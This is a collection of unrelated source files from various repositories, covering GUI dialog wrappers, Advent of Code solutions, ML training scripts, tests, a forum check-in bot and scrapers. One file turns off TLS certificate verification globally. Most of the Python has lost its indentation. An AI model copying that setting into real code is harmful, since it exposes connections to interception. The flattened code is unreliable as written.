@组件_异常检测
def 组件_报错信息框(内容):
"弹出一个带红叉图标的信息框"
return wx.LogError(内容)
@组件_异常检测
def 组件_文件选择器(标题="请选择文件",初始路径="",默认文件名="",过滤器="所有文件|*.*",父窗口=None):
"选择文件后返回完整文件路径,没选择返回空文本,可添加参数,flags(标识),parent(父窗口),x,y"
return wx.FileSelector(标题, 初始路径,默认文件名, wildcard=过滤器)
@组件_异常检测
def 组件_保存文件对话框(提示="",后缀="*",默认文件名="",父窗口=None):
"设置文件后返回完整文件路径,没选择返回空文本"
return wx.SaveFileSelector(提示, 后缀,默认文件名, 父窗口)
@组件_异常检测
def 组件_目录选择器(提示="",初始路径="",父窗口=None):
"选择目录后返回完整路径,没选择返回空文本,返回示例:c:\\user"
return wx.DirSelector(message=提示, default_path=初始路径,parent=父窗口)
@组件_异常检测
def 组件_颜色选择器(初始颜色=None,标题="请选择颜色",父窗口=None):
"选择颜色后返回颜色值(0,0,0,255),可添加参数,flags(标识),parent(父窗口),x,y"
return wx.GetColourFromUser(父窗口, 初始颜色,标题)
@组件_异常检测
def 组件_字体选择器(父窗口,默认字体=None,标题="请选择字体"):
"选择字体后返回字体类型"
return wx.GetFontFromUser(父窗口,默认字体 if 默认字体 else 父窗口.GetFont(),标题)
@组件_异常检测
def 组件_数值对话框(标题="请设置数值",提示="",参数提示="",默认值=1,最小值=1,最大值=100,父窗口=None):
"不能在线程里调用,弹出一个设置数值的对话框"
return wx.GetNumberFromUser(提示, 参数提示, 标题, 默认值, 最小值, 最大值, 父窗口)
@组件_异常检测
def 组件_密码对话框(提示="",标题="请输入密码",默认文本="",父窗口=None):
"弹出一个文本对话框,输入的内容会被替换成圆点,适合密码等输入使用,确认后返回输入的内容,取消返回空文本"
return wx.GetPasswordFromUser(message=提示,caption=标题, default_value=默认文本,parent=父窗口)
@组件_异常检测
def 组件_单选列表对话框(提示="",标题="请选择",选择项=['未设置'],初始选中=0,父窗口=None):
"弹出一个单选列表对话框,选择后返回选中的文本内容,取消返回空,选择项必须是文本型列表,初始选中从0开始"
return wx.GetSingleChoice(message=提示,caption=标题,choices=选择项,initialSelection=初始选中,parent=父窗口)
@组件_异常检测
def 组件_普通对话框(提示="",标题="请输入",默认文本='',父窗口=None):
"弹出一个对话框输入文本,确认后返回输入的文本,取消返回空"
return wx.GetTextFromUser(message=提示,caption=标题,default_value=默认文本,parent=父窗口)
@组件_异常检测
def 组件_气泡提示框(父窗口,提示="",标题="",超时时间=3000,x=0,y=0):
"弹出一个气泡提示框,默认在组件中间,可通过设置x,y调整"
气泡 = wx.adv.RichToolTip(标题,提示)
气泡.SetTimeout(超时时间)
气泡.ShowFor(父窗口,(0,0,x*2,y*2))
@组件_异常检测
def 组件_系统弹窗(父窗口=None,提示="",标题=""):
"电脑右下角弹出一个提示框,可以绑定提示框点击事件,详细操作:https://wxpython.org/Phoenix/docs/html/wx.adv.NotificationMessage.html#wx.adv.NotificationMessage.Show"
提示框 = wx.adv.NotificationMessage(标题,提示,父窗口)
提示框.Show()
``` |
{
"source": "1451678/adventofcode",
"score": 3
} |
#### File: adventofcode/2021/day13.py
```python
with open("13.in") as file:
lines = file.readlines()
lines = [line.rstrip() for line in lines]
def initGrid():
i = 0
rmax = 0
cmax = 0
while(lines[i] != ""):
r = int(lines[i].split(",")[0])
c = int(lines[i].split(",")[1])
if r > rmax:
rmax = r
if c > cmax:
cmax = c
i += 1
G = []
for i in range(0, cmax+1):
row = [0] * (rmax+1)
G.append(row)
return G
def foldX(G, line):
X = []
for r in range(0, len(G)):
row = [0] * line
X.append(row)
for r in range(0, len(G)):
for c in range(0, line):
X[r][c] = G[r][c]
for r in range(0, len(G)):
for c in range(2*line, line, -1):
if len(G[0]) > c and X[r][2*line-c] == 0:
X[r][2*line-c] += G[r][c]
return X
def foldY(G, line):
X = []
for r in range(0, line):
row = [0] * len(G[0])
X.append(row)
for r in range(0, line):
for c in range(0, len(G[0])):
X[r][c] = G[r][c]
for r in range(2*line, line, -1):
for c in range(0, len(G[0])):
if len(G) > r and X[2*line-r][c] == 0:
X[2*line-r][c] += G[r][c]
return X
def fold(index):
global G
direction, line = lines[index].split("=")
if "x" in direction:
G = foldX(G, int(line))
else:
G = foldY(G, int(line))
# Part 1
G = initGrid()
index = 0
while(lines[index] != ""):
c = int(lines[index].split(",")[0])
r = int(lines[index].split(",")[1])
G[r][c] = 1
index += 1
fold(index+1)
result = 0
for i in range(0, len(G)):
result += sum(G[i])
print(result)
# Part 2
for j in range(index+2, len(lines)):
fold(j)
for r in range(0, len(G)):
out = ""
for c in range(0, len(G[0])):
if G[r][c] == 0:
out += " "
else:
out += "##"
print(out)
```
#### File: adventofcode/2021/day14.py
```python
import collections
import copy
import math
with open("14.in") as file:
lines = file.readlines()
lines = [line.rstrip() for line in lines]
def addOrSet(dict, key, value):
if key in dict:
dict[key] += value
else:
dict[key] = value
def solve(steps):
start = lines[0]
after = {}
for i in range(0, len(start)-1):
addOrSet(after, start[i:i+2], 1)
insertions = {}
for i in range(2, len(lines)):
pair, insertion = lines[i].split(" -> ")
insertions[pair] = insertion
counter = {}
for i in range(0, steps):
before = copy.deepcopy(after)
for j in range(0, len(list(insertions))):
insertion = list(insertions)[j]
if insertion in before and before[insertion] > 0:
addOrSet(after, insertion[0] + list(insertions.values())[j], before[insertion])
addOrSet(after, list(insertions.values())[j] + insertion[1], before[insertion])
after[insertion] -= before[insertion]
for i in range(0, len(after)):
addOrSet(counter, list(after.keys())[i][0], list(after.values())[i])
addOrSet(counter, list(after.keys())[i][1], list(after.values())[i])
for i in range(0, len(counter)):
counter[list(counter.keys())[i]] = math.ceil(
list(counter.values())[i]/2)
s = sorted(counter.items(), key=lambda item: item[1])
print(s[len(s)-1][1]-s[0][1])
# Part 1
solve(10)
# Part 2
solve(40)
```
#### File: adventofcode/2021/day15.py
```python
from collections import defaultdict
from heapq import *
import copy
with open("15.in") as file:
lines = file.readlines()
lines = [line.rstrip() for line in lines]
def fillGrid():
for line in lines:
G.append(list([int(x) for x in line]))
def createEdges(G):
edges = []
for r in range(0, len(G)):
for c in range(0, len(G[0])):
if c-1 >= 0:
edges.append((r*len(G[0])+c-1, r*len(G[0])+c, G[r][c]))
if r-1 >= 0:
edges.append(((r-1)*len(G[0])+c, r*len(G[0])+c, G[r][c]))
if r+1 < len(G):
edges.append(((r+1)*len(G[0])+c, r*len(G[0])+c, G[r][c]))
if c+1 < len(G[0]):
edges.append((r*len(G[0])+c+1, r*len(G[0])+c, G[r][c]))
return edges
def dijkstra(edges, f, t):
g = defaultdict(list)
for l, r, c in edges:
g[l].append((c, r))
q, seen, mins = [(0, f, [])], set(), {f: 0}
while q:
(cost, v1, path) = heappop(q)
if v1 not in seen:
seen.add(v1)
path = [v1] + path
if v1 == t:
return (cost, path)
for c, v2 in g.get(v1, ()):
if v2 in seen:
continue
prev = mins.get(v2, None)
next = cost + c
if prev is None or next < prev:
mins[v2] = next
heappush(q, (next, v2, path))
return (float("inf"), [])
# Part 1
G = []
fillGrid()
edges = createEdges(G)
print(dijkstra(edges, 0, len(G)*len(G[0])-1)[0])
# Part 2
G2 = copy.deepcopy(G)
for i in range(1, 5):
for r in range(0, len(G)):
line = [x+i for x in G[r]]
for c in range(0, len(line)):
if line[c] > 9:
line[c] = line[c] - 9
G2[r].extend(line)
for i in range(1, 5):
for r in range(0, len(G)):
line = [x+i for x in G2[r]]
for c in range(0, len(line)):
if line[c] > 9:
line[c] = line[c] - 9
G2.append(line)
edges = createEdges(G2)
print(dijkstra(edges, 0, len(G2)*len(G2[0])-1)[0])
``` |
{
"source": "1452712/DataMining_course_project",
"score": 3
} |
#### File: DataMining_course_project/hw3/q1_randomForest.py
```python
import numpy as np
import pandas as pd
import math
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
# import data
def importData(inFile):
data = pd.read_csv(inFile)
out = {}
out["RSSI"] = []
out["Grid"] = []
minLon = 121.47738 # min(data["Longitude"])
maxLon = 121.5025075 # max(data["Longitude"])\
lonCount = math.ceil((maxLon - minLon) / 0.0001)
minLat = 31.20891667 # min(data["Latitude"])
maxLat = 31.219175 # max(data["Latitude"])
latCount = math.ceil((maxLat - minLat) / 0.0001)
for i in range(len(data)):
# Strength of Signal
# RSSI = RSCP – EcNo
out["RSSI"].append([data["RSCP_1"][i] - data["EcNo_1"][i]])
# GPS Grid ID
x = int((data["Longitude"][i] - minLon) / 0.0001)
y = int((data["Latitude"][i] - minLat) / 0.0001)
out["Grid"].append(int(x + y * lonCount))
return out
# calculate accuracy
def getAccuracy(res, target):
if len(res) != len(target):
return 0
num = len(res)
count = 0
for i in range(num):
if int(res[i]) == target[i]:
count = count + 1
return float(count) / float(num) * 100
"""
"main" function
"""
# LTE
#train_data = importData("new4gtrain.csv")
#test_data = importData("new4gtest.csv")
#estimators = 7
# GSM
train_data = importData("new2gtrain.csv")
test_data = importData("new2gtest.csv")
cla_estimators = 10
reg_estimators = 10
# Random Forest Classifier
acc = []
for i in range(10):
classifier = RandomForestClassifier(n_estimators=cla_estimators)
classifier.fit(train_data["RSSI"], train_data["Grid"])
cla_res = classifier.predict(test_data["RSSI"])
cla_accuracy = getAccuracy(cla_res, test_data["Grid"])
acc.append(cla_accuracy)
acc.sort()
plt.plot(acc, range(1, 11))
plt.xlabel("No.")
plt.ylabel("Accuracy")
plt.show
print "Med-accuracy of Random Forest Classifier is %d" % acc[6]
# Random Forest Regressor
reg_acc = []
for i in range(10):
regressor = RandomForestRegressor()
regressor.fit(train_data["RSSI"], train_data["Grid"])
reg_res = regressor.predict(test_data["RSSI"])
reg_accuracy = getAccuracy(reg_res, test_data["Grid"])
reg_acc.append(reg_accuracy)
reg_acc.sort()
plt.plot(reg_acc, range(1, 11))
plt.xlabel("No.")
plt.ylabel("Accuracy")
plt.show
print "Med-accuracy of Random Forest Regressor is %d" % reg_acc[6]
``` |
{
"source": "1455033987/mkbrowser",
"score": 3
} |
#### File: main/python/hello.py
```python
from java import jclass
from goose3 import Goose
from goose3.text import StopWordsChinese
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
def gethtmldes(url):
g = Goose({'browser_user_agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) ','stopwords_class': StopWordsChinese})
article = g.extract(url=url)
return article.meta_description
# def greet(name):
# print("--- hello,%s ---" % name)
#
# def add(a,b):
# return a + b
#
# def sub(count,a=0,b=0,c=0):
# return count - a - b -c
#
# def get_list(a,b,c,d):
# return [a,b,c,d]
#
# def print_list(data):
# print(type(data))
# # 遍历Java的ArrayList对象
# for i in range(data.size()):
# print(data.get(i))
# python调用Java类
def get_java_bean():
JavaBean = jclass("cn.mkblog.www.mkbrowser.JavaBean")#用自己的包名
jb = JavaBean("python")
jb.setData("json")
jb.setData("xml")
jb.setData("xhtml")
return jb
``` |
{
"source": "145k0v/classification-python",
"score": 3
} |
#### File: classification-python/tests/test_payload_converters.py
```python
from classification import entities, payloadconverters
from pytest import fixture
def test_student_to_tasks_to_save_request_conversion():
input = {'student_1': {'lab1': 5, 'lab2': 10},
'student_2': {'lab3': 50, 'lab4': -101}}
expected = [
entities.StudentClassificationPreviewDto(
classification_identifier='lab1',
student_username='student_1',
value=5),
entities.StudentClassificationPreviewDto(
classification_identifier='lab2',
student_username='student_1',
value=10),
entities.StudentClassificationPreviewDto(
classification_identifier='lab4',
student_username='student_2',
value=-101),
entities.StudentClassificationPreviewDto(
classification_identifier='lab3',
student_username='student_2',
value=50),
]
actual = payloadconverters.save_request_from_s2t(input)
assert len(actual) == len(expected)
for e in expected:
assert e in actual
def test_task_to_students_to_save_request_conversion():
input = {'lab1': {'student_1': 14, 'student_3': -21},
'lab2': {'student_2': 66, 'student_4': 'over9000'}}
expected = [
entities.StudentClassificationPreviewDto(
classification_identifier='lab1',
student_username='student_1',
value=14),
entities.StudentClassificationPreviewDto(
classification_identifier='lab2',
student_username='student_2',
value=66),
entities.StudentClassificationPreviewDto(
classification_identifier='lab1',
student_username='student_3',
value=-21),
entities.StudentClassificationPreviewDto(
classification_identifier='lab2',
student_username='student_4',
value='over9000'),
]
actual = payloadconverters.save_request_from_t2s(input)
assert len(actual) == len(expected)
for e in expected:
assert e in actual
@fixture
def get_request_payload():
return [
{'classificationMap':
{'lab01': 1.0,
'mark': 'F',
'pandas': 3.75,
'sem_check': False,
'tasks': 4.75,
'tasks_check': False,
'total': 4.75},
'email': '...@<EMAIL>',
'firstName': '...',
'fullName': None,
'lastName': '...',
'username': 'student_1'},
{'classificationMap':
{'lab01': 5.0,
'lab02': 3.0,
'lab03': 4.8,
'lab04': 3.0,
'lab05': 4.2,
'mark': 'F',
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://github.com/...',
'tasks': 25.0,
'tasks_check': True,
'total': 25.0,
'wt01': 5.0},
'email': '...@<EMAIL>',
'firstName': '...',
'fullName': None,
'lastName': '...',
'username': 'student_2'},
{'classificationMap':
{'lab01': 2.0,
'lab03': 4.8,
'lab04': 5.0,
'lab05': 4.5,
'mark': 'F',
'pandas': 4.375,
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://gitlab.fit.cvut.cz/...',
'tasks': 32.675,
'tasks_check': True,
'total': 32.675,
'wt01': 5.0,
'wt02': 2.0,
'wt3': 5.0},
'email': '...@<EMAIL>',
'firstName': '...',
'fullName': None,
'lastName': '...',
'username': 'student_3'}
]
def test_student_to_tasks_from_get_response_converter(get_request_payload):
input = get_request_payload
expected = {'student_1': {'lab01': 1.0,
'mark': 'F',
'pandas': 3.75,
'sem_check': False,
'tasks': 4.75,
'tasks_check': False,
'total': 4.75},
'student_2': {'lab01': 5.0,
'lab02': 3.0,
'lab03': 4.8,
'lab04': 3.0,
'lab05': 4.2,
'mark': 'F',
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://github.com/...',
'tasks': 25.0,
'tasks_check': True,
'total': 25.0,
'wt01': 5.0},
'student_3': {'lab01': 2.0,
'lab03': 4.8,
'lab04': 5.0,
'lab05': 4.5,
'mark': 'F',
'pandas': 4.375,
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://gitlab.fit.cvut.cz/...',
'tasks': 32.675,
'tasks_check': True,
'total': 32.675,
'wt01': 5.0,
'wt02': 2.0,
'wt3': 5.0}
}
actual = payloadconverters.s2t_from_get_response(input)
assert actual == expected
def test_task_to_students_from_get_response_converter(get_request_payload):
input = get_request_payload
expected = {'lab01': {'student_1': 1.0,
'student_2': 5.0,
'student_3': 2.0},
'mark': {'student_1': 'F',
'student_2': 'F',
'student_3': 'F'},
'pandas': {'student_1': 3.75,
'student_3': 4.375},
'sem_check': {'student_1': False,
'student_2': False,
'student_3': False},
'tasks': {'student_1': 4.75,
'student_2': 25.0,
'student_3': 32.675},
'tasks_check': {'student_1': False,
'student_2': True,
'student_3': True},
'total': {'student_1': 4.75,
'student_2': 25.0,
'student_3': 32.675},
'lab02': {'student_2': 3.0},
'lab03': {'student_2': 4.8,
'student_3': 4.8},
'lab04': {'student_2': 3.0,
'student_3': 5.0},
'lab05': {'student_2': 4.2,
'student_3': 4.5},
'sem_approved': {'student_2': True,
'student_3': True},
'sem_def': {'student_2': 'https://github.com/...',
'student_3': 'https://gitlab.fit.cvut.cz/...'},
'wt01': {'student_2': 5.0,
'student_3': 5.0},
'wt02': {'student_3': 2.0},
'wt3': {'student_3': 5.0}
}
actual = payloadconverters.t2s_from_get_response(input)
assert actual == expected
``` |
{
"source": "1462903025/zodgame_checkin",
"score": 3
} |
#### File: zodgame_checkin/zodgame/zodgame.py
```python
import re
import sys
from selenium import webdriver
def zodgame(cookie_string):
options = webdriver.ChromeOptions()
options.add_argument('--headless')
#options.add_argument("user-agent=Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Mobile Safari/537.36")
driver = webdriver.Chrome(options = options)
cookie_dict = [ {"name" : x.split('=')[0].strip(), "value": x.split('=')[1].strip()} for x in cookie_string.split(';')]
url = "https://zodgame.xyz/plugin.php?id=dsu_paulsign:sign"
driver.get(url)
driver.delete_all_cookies()
for cookie in cookie_dict:
driver.add_cookie({
"domain": "zodgame.xyz",
"name": cookie["name"],
"value": cookie["value"],
"path": "/",
})
driver.get(url)
try:
driver.find_element_by_xpath('//div[@class="bm_h cl"]')
except:
print("Login failed, Please check the cookie.")
assert False, "Login failed, Please check the cookie."
formhash = driver.find_element_by_xpath('//input[@name="formhash"]').get_attribute('value')
url2 = "https://zodgame.xyz/plugin.php?id=dsu_paulsign:sign&operation=qiandao&infloat=1&inajax=0"
ajax_query = """
(function (){
var request = new XMLHttpRequest();
var fd = new FormData();
fd.append("formhash","%s");
fd.append("qdxq","kx");
request.open("POST","%s",false);
request.withCredentials=true;
request.send(fd);
return request;
})();
""" % (formhash, url2)
ajax_query = ajax_query.replace("\n", "")
resp = driver.execute_script("return " + ajax_query)
match = re.search('<div class="c">\n(.*?)</div>\n',resp["response"],re.S)
if match is not None:
message = match.group(1)
else:
message = "签到失败"
print(message)
if "您今日已经签到,请明天再来" in message or "恭喜你签到成功!" in message:
pass
else:
assert False
driver.close()
driver.quit()
if __name__ == "__main__":
cookie_string = sys.argv[1]
if cookie_string:
zodgame(cookie_string)
else:
print("未配置Cookie")
``` |
{
"source": "1466899531/auto_api_test",
"score": 2
} |
#### File: auto_api_test/scripts/test_template.py
```python
import pytest
import requests
from time import sleep
from api.template_api import TemplateAPI
from tools.get_log import GetLog
from tools.read_file import read_json
import allure
# 获取日志器
log = GetLog.get_log()
@allure.feature('测试类模板')
@pytest.skip("参考模板, 不执行")
class TestTemplate:
session = None
# 初始化方法
@classmethod
def setup_class(cls):
cls.session = requests.Session() # 初始化session对象
cls.template = TemplateAPI()
# 结束方法
@classmethod
def teardown_class(cls):
cls.session.close()
@classmethod
def setup(cls):
sleep(1.5)
# 测试方法
@allure.story("测试方法模板-add")
@pytest.mark.parametrize(("attr1", "attr2", "success", "expect"), read_json("test_add"))
def test_add(self, attr1, attr2, success, expect):
# 添加功能API调用
response = self.template.api_add(self.session, attr1, attr2)
# 打印日志
log.info("添加功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
@allure.story("测试方法模板-upd")
@pytest.mark.parametrize(("attr1", "attr2", "success", "expect"), read_json("test_upd"))
def test_upd(self, attr1, attr2, success, expect):
# 添加功能API调用
response = self.template.api_upd(self.session, attr1, attr2)
# 打印日志
log.info("修改功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
@allure.story("测试方法模板-get")
@pytest.mark.parametrize(("attr1", "attr2", "success", "expect"), read_json("test_get"))
def test_get(self, attr1, attr2, success, expect):
# 添加功能API调用
response = self.template.api_get(self.session, attr1, attr2)
# 打印日志
log.info("查询功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
@allure.story("测试方法模板-del")
@pytest.mark.parametrize(("uid", "success", "expect"), read_json("test_del"))
def test_del(self, uid, success, expect):
# 添加功能API调用
response = self.template.api_del(self.session, uid)
# 打印日志
log.info("删除功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
``` |
{
"source": "146790g/pytorch_handbook",
"score": 3
} |
#### File: pytorch_handbook/appendix/table_dataset.py
```python
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
def main():
## 各種設定
num_workers = 2 # データ読み込みに使用するサブプロセス数の設定
batch_size = 30 # バッチサイズの設定
epoch_size = 20 # エポックサイズの設定
## データセットとデータローダー
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', header=None,
names=['sepal-length',
'sepal-width',
'petal-length',
'petal-width',
'class']) # UCI Machine Learning RepositoryのIrisのデータセットを例として使用
class_mapping = {label:idx for idx, label in enumerate(np.unique(df['class']))}
df['class'] = df['class'].map(class_mapping) # クラスラベルを整数にエンコーディング
features = torch.tensor(df[['sepal-length', 'sepal-width', 'petal-length', 'petal-width']].values,
dtype=torch.float) # 説明変数のTensor
labels = torch.tensor(df['class'].values, dtype=torch.long) # 目的変数のTensor
dataset = torch.utils.data.TensorDataset(features, labels) # データセット作成
# データセットを80:20:50でトレーニングデータセット:バリデーションデータセット:テストデータセットに分割
train_set, valid_set, test_set = torch.utils.data.random_split(dataset, lengths=[80, 20, 50])
# トレーニングデータセットのデータローダー
train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=num_workers)
# バリデーションデータセットのデータローダー
valid_loader = torch.utils.data.DataLoader(valid_set, batch_size=batch_size, shuffle=False, num_workers=num_workers)
# テストデータセットのデータローダー
test_loader = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=num_workers)
## ニューラルネットワークの設定
net = torch.nn.Sequential(
nn.Linear(4, 64),
nn.ReLU(),
nn.Linear(64, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU(),
nn.Linear(64, 4)
) # MLP
print(net)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print('device:', device)
net.to(device) # for GPU
## 損失関数とオプティマイザーの設定
criterion = nn.CrossEntropyLoss() # 損失関数(ソフトマックス交差エントロピー)
optimizer = optim.Adam(net.parameters(), lr=0.001) # オプティマイザー(Adamオプティマイザー)
## 学習実行
epoch_list = []
train_acc_list = []
valid_acc_list = []
for epoch in range(epoch_size): # エポックのループ
net.train() # ニューラルネットを訓練モードに設定
train_true = []
train_pred = []
for itr, data in enumerate(train_loader): # トレーニングのループ
features, labels = data
train_true.extend(labels.tolist()) # クラスラベルのGround-Truthをリストに追加
features, labels = features.to(device), labels.to(device) # for GPU
optimizer.zero_grad() # 勾配をリセット
logits = net(features) # ニューラルネットでロジットを算出
loss = criterion(logits, labels) # 損失値を算出
loss.backward() # 逆伝播
optimizer.step() # オプティマイザーでニューラルネットのパラメータを更新
_, predicted = torch.max(logits.data, 1) # 最大のロジットからクラスラベルの推論値を算出
train_pred.extend(predicted.tolist()) # 推論結果をリストに追加
print('[epochs: {}, mini-batches: {}, records: {}] loss: {:.3f}'.format(
epoch + 1, itr + 1, (itr + 1) * batch_size, loss.item())) # 損失値の表示
net.eval() # ニューラルネットを評価モードに設定
valid_true = []
valid_pred = []
for itr, data in enumerate(valid_loader): # バリデーションのループ
features, labels = data
valid_true.extend(labels.tolist()) # クラスラベルのGround-Truthをリストに追加
features, labels = features.to(device), labels.to(device) # for GPU
with torch.no_grad(): # バリデーションなので勾配計算OFF
logits = net(features)
_, predicted = torch.max(logits.data, 1) # 最大のロジットからクラスラベルの推論値を算出
valid_pred.extend(predicted.tolist()) # 推論結果をリストに追加
train_acc = accuracy_score(train_true, train_pred) # トレーニングでの正答率をsklearnの機能で算出
valid_acc = accuracy_score(valid_true, valid_pred) # バリデーションでの正答率をsklearnの機能で算出
# エポックごとのトレーニングとバリデーションの正答率を表示
print(' epocs: {}, train acc.: {:.3f}, valid acc.: {:.3f}'.format(epoch + 1, train_acc, valid_acc))
print()
epoch_list.append(epoch + 1) # ログ用
train_acc_list.append(train_acc)
valid_acc_list.append(valid_acc)
print('Finished Training')
print('Save Network')
torch.save(net.state_dict(), 'model.pth') # 学習したパラメータを保存
df = pd.DataFrame({'epoch': epoch_list,
'train/accuracy': train_acc_list,
'valid/accuracy': valid_acc_list}) # ログ用にデータフレームを作成
print('Save Training Log')
df.to_csv('train.log', index=False) # データフレームをCSVで保存
## 学習後の推論実行
net.eval() # ニューラルネットを評価モードに設定
test_true = []
test_pred = []
for itr, data in enumerate(test_loader): # バリデーションのループ
features, labels = data
test_true.extend(labels.tolist()) # クラスラベルのGround-Truthをリストに追加
features, labels = features.to(device), labels.to(device) # for GPU
with torch.no_grad(): # バリデーションなので勾配計算OFF
logits = net(features)
_, predicted = torch.max(logits.data, 1) # 最大のロジットからクラスラベルの推論値を算出
test_pred.extend(predicted.tolist()) # 推論結果をリストに追加
test_acc = accuracy_score(test_true, test_pred) # テストでの正答率をsklearnの機能で算出
print('test acc.: {:.3f}'.format(test_acc))
if __name__ == '__main__':
main()
``` |
{
"source": "1474net/d",
"score": 3
} |
#### File: app/utils/scrap.py
```python
import requests
# establishing session
s = requests.Session()
s.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0'
})
def load_user_data(page, session):
url = 'http://www.mfc-chita.ru/filial/chita/vopros-otvet?&&&page=%d' % (page)
request = session.get(url)
return request.text
# loading files
page = 0
while True:
data = load_user_data(page, s)
if page <=25:
with open('./user_data/page_%d.html' % (page), 'wb') as output_file:
output_file.write(data.encode('utf-8'))
page += 1
else:
break
``` |
{
"source": "1480c1/aom",
"score": 3
} |
#### File: gop_bitrate/python/bitrate_accuracy_percentage_error.py
```python
import numpy as np
# Finds the coefficient to multiply A by to minimize
# the percentage error between A and B.
def minimize_percentage_error_model_a(A, B):
z = np.where(B == 0)[0]
A = np.delete(A, z, axis=0)
B = np.delete(B, z, axis=0)
z = np.where(A == 0)[0]
A = np.delete(A, z, axis=0)
B = np.delete(B, z, axis=0)
R = np.divide(A, B)
num = 0
den = 0
for r_i in R:
num += r_i
den += r_i**2
if den == 0:
x = 0
else:
x = (num / den)[0]
return x
def minimize_percentage_error_model_b(r_e, r_m, r_f):
z = np.where(r_f == 0)[0]
r_e = np.delete(r_e, z, axis=0)
r_m = np.delete(r_m, z, axis=0)
r_f = np.delete(r_f, z, axis=0)
r_ef = np.divide(r_e, r_f)
r_mf = np.divide(r_m, r_f)
sum_ef = np.sum(r_ef)
sum_ef_sq = np.sum(np.square(r_ef))
sum_mf = np.sum(r_mf)
sum_mf_sq = np.sum(np.square(r_mf))
sum_ef_mf = np.sum(np.multiply(r_ef, r_mf))
# Divides x by y. If y is zero, returns 0.
divide = lambda x, y : 0 if y == 0 else x / y
# Set up and solve the matrix equation
A = np.array([[1, divide(sum_ef_mf, sum_ef_sq)],[divide(sum_ef_mf, sum_mf_sq), 1]])
B = np.array([divide(sum_ef, sum_ef_sq), divide(sum_mf, sum_mf_sq)])
A_inv = np.linalg.pinv(A)
x = np.matmul(A_inv, B)
return x
# Calculates the average percentage error between A and B.
def average_error_model_a(A, B, x):
error = 0
for i, a in enumerate(A):
a = a[0]
b = B[i][0]
if b == 0:
continue
error += abs(x*a - b) / b
error *= 100
error /= A.shape[0]
return error
def average_error_model_b(A, M, B, x):
error = 0
for i, a in enumerate(A):
a = a[0]
mv = M[i]
b = B[i][0]
if b == 0:
continue
estimate = x[0]*a
estimate += x[1]*mv
error += abs(estimate - b) / b
error *= 100
error /= A.shape[0]
return error
# Traverses the data and prints out one value for
# each update type.
def print_solutions(file_path):
data = np.genfromtxt(file_path, delimiter="\t")
prev_update = 0
split_list_indices = list()
for i, val in enumerate(data):
if prev_update != val[3]:
split_list_indices.append(i)
prev_update = val[3]
split = np.split(data, split_list_indices)
for array in split:
A, mv, B, update = np.hsplit(array, 4)
print("update type:", update[0][0])
xa = minimize_percentage_error_model_a(A, B)
xb = minimize_percentage_error_model_b(A, mv, B)
print("Model A coefficients:", xa, " | Model B coefficients:", xb)
error_a = average_error_model_a(A, B, xa)
error_b = average_error_model_b(A, mv, B, xb)
baseline_error_a = average_error_model_a(A, B, 1)
baseline_error_b = average_error_model_b(A, mv, B, [1, 1])
print("error a:", error_a, " | error b:", error_b)
print("baseline error a:", baseline_error_a, "baseline error b:", baseline_error_b)
print()
if __name__ == "__main__":
print_solutions("data2/lowres_17f_target150_data.txt")
``` |
{
"source": "1480c1/poe-currency-flip-planner",
"score": 3
} |
#### File: poe-currency-flip-planner/src/commons.py
```python
import logging
from typing import Any, Dict, List, Set
import numpy as np
league_names = ["Heist", "Hardcore Heist", "Standard", "Hardcore"]
def filter_large_outliers(offers: List[Dict]) -> List[Dict]:
"""
Filter out all offers with a conversion rate which is above the
95th percentile of all found conversion rates for an item pair.
"""
if len(offers) > 10:
conversion_rates = [e["conversion_rate"] for e in offers]
upper_boundary = np.percentile(conversion_rates, 95)
offers = [x for x in offers if x["conversion_rate"] < upper_boundary]
return offers
def init_logger(debug: bool):
level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(level=level, format='%(message)s')
def load_excluded_traders():
default_path = "config/excluded_traders.txt"
with open(default_path, "r") as f:
excluded_traders = [x.strip() for x in f.readlines()]
return excluded_traders
def unique_conversions_by_trader_name(
conversions: List[Dict[str, Any]]) -> List[Dict]:
seen_traders: Set[str] = set()
unique_conversions = []
for conversion in conversions:
trader_names = [t.contact_ign for t in conversion["transactions"]]
has_seen_trader = any(
[True for x in trader_names if x in seen_traders])
if has_seen_trader:
continue
for t in trader_names:
seen_traders.add(t)
unique_conversions.append(conversion)
return unique_conversions
``` |
{
"source": "1483795887/ubiquant_danet",
"score": 2
} |
#### File: 1483795887/ubiquant_danet/main.py
```python
from DAN_Task import DANetClassifier, DANetRegressor
import argparse
import os
import torch.distributed
import torch.backends.cudnn
from sklearn.metrics import accuracy_score, mean_squared_error
from data.dataset import get_data
from lib.utils import normalize_reg_label
from qhoptim.pyt import QHAdam
from config.default import cfg
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
def get_args():
parser = argparse.ArgumentParser(description='PyTorch v1.4, DANet Task Training')
parser.add_argument('-c', '--config', type=str, required=False, default='config/forest_cover_type.yaml', metavar="FILE", help='Path to config file')
parser.add_argument('-g', '--gpu_id', type=str, default='1', help='GPU ID')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
